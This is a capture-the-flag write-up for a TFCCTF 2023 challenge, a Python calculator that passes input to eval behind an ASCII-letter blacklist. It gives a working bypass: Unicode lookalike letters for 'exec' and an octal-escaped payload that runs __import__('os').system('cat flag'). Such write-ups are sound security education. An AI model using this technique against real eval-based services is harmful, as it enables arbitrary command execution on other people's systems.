TFCCTF 2023 – My first calculator
Author: Lumy
My first calculator (50 points, 116 solves)
Heard that eval is dangerous and made sure it is secure this time
Source code
```python
import sys

print("This is a calculator")
inp = input("Formula: ")
sys.stdin.close()

# Character-level blacklist: every ASCII letter plus "."
blacklist = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ."
if any(x in inp for x in blacklist):
    print("Nice try")
    exit()

# The only name deliberately exposed to the evaluated expression
fns = {
    "pow": pow
}
print(eval(inp, fns, fns))
```
All ASCII letters and "." are filtered, so we need a way to have code evaluated without any of those characters appearing literally in the input.
Solution
To get past the letter filter, we can use Unicode letter variants for the identifier and octal character escapes inside the string literal, as below:
Website for string to Unicode encoding: qaz.wtf/u/convert.cgi
Website for string to octal encoding: onlinestringtools.com/convert-string-to-octal
Here is the plain-text form of the payload used:
```python
exec(eval(__import__('os').system('cat flag')))
```
As the "." is filtered, we have to represent this char using octal, and we have to convert the "exec" string into unicode
𝘦𝘹𝘦𝘤("\145\166\141\154\50\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\143\141\164\40\146\154\141\147\47\51\51")